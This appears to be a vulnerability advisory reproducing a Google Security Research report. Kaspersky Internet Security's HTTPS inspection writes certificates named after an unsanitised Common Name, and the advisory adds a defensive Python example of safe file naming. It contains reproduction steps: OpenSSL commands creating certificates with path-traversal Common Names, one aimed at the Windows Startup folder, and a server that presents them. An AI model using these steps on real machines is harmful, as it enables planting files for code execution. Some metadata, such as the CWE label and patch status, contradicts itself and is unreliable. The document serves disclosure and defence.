Vendor: Kaspersky Internet Security
By: Google Security Research
CVSS: 7.5 (HIGH)
CWE: 352 (Certificate Validation Bypass)
Product Name: Kaspersky Internet Security
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

Certificate Validation Bypass via Malicious Certificate Name

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. The files are named after the certificate's Common Name, following the pattern {CN}.cer, and the CN is not sanitized before it is used as a file name. A certificate whose CN contains path traversal sequences such as ../ therefore causes the file to be written outside the intended directory, which an attacker can use to bypass certificate validation and potentially execute arbitrary code. The attacker generates such a certificate with OpenSSL and starts a TLS server that presents it. When a Windows host with Kaspersky installed navigates to that server, Kaspersky writes the certificate file to the location chosen through the CN (the desktop in the report below) without any user interaction, which is the step that potentially leads to code execution.

Mitigation:

Apply the patch provided by the vendor. Disable Kaspersky https inspection if not required. Ensure that the certificate Common Name (CN) is sanitized before it is used to build a file name, so that path separators, ".." sequences and embedded NUL bytes cannot redirect the write or lead to arbitrary code execution.

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=539

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.

I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.

Here is how to generate a certificate to reproduce:
$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:

Then start a test server like this:

$ openssl s_server -key key.pem  -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked; note that it's not necessary to click or interact with anything to produce the file.
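The report shows the CN being used unsanitized as a file name ({CN}.cer). As an added example that is not part of the original report or of Kaspersky's code, the following Python contrasts that pattern with a hardened one: a hostname-only allow-list for the CN, a digest-based fallback name, and a final containment check on the resulting path. The cache directory and the benign CN are constructed placeholders; the traversal CN is the one quoted in the report.

```python
import hashlib
import os
import re

# Constructed sample inputs. The cache directory is a placeholder, not the
# product's real path; the traversal CN is the one quoted in the report.
CERT_CACHE = "/ProgramData/ExampleAV/certs"
BENIGN_CN = "www.example.com"
TRAVERSAL_CN = "../../../../Users/All Users/Start Menu/Startup/foo.bat\x00"

# Allow-list: hostname characters only, so no separators and no dots-only names.
_SAFE_CN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,252}$")


def naive_cert_path(base_dir, cn):
    """The vulnerable pattern described in the report: the CN is trusted as {CN}.cer."""
    return os.path.normpath(os.path.join(base_dir, cn + ".cer"))


def escapes_base(base_dir, path):
    """True when path lies outside base_dir (pure string check, no disk I/O)."""
    base = os.path.normpath(base_dir)
    return os.path.commonpath([base, os.path.normpath(path)]) != base


def cn_is_safe_filename(cn):
    """Accept only CNs that no filesystem or C string API can reinterpret.

    NUL is rejected explicitly: a C runtime stops at it, so a ".cer" suffix
    appended afterwards would silently vanish and the name would end in
    whatever preceded the NUL.
    """
    return "\x00" not in cn and _SAFE_CN.match(cn) is not None


def safe_cert_path(base_dir, cn):
    """Hardened replacement: an unsafe CN is swapped for its SHA-256 hex digest,
    which cannot contain path syntax, and the result is re-checked for containment."""
    if cn_is_safe_filename(cn):
        name = cn
    else:
        name = hashlib.sha256(cn.encode("utf-8")).hexdigest()
    path = os.path.normpath(os.path.join(base_dir, name + ".cer"))
    if escapes_base(base_dir, path):  # defence in depth; should be unreachable
        raise ValueError("certificate cache path escaped its directory")
    return path


if __name__ == "__main__":
    print(repr(naive_cert_path(CERT_CACHE, TRAVERSAL_CN)))  # resolves into Startup
    print(safe_cert_path(CERT_CACHE, TRAVERSAL_CN))          # stays inside the cache
```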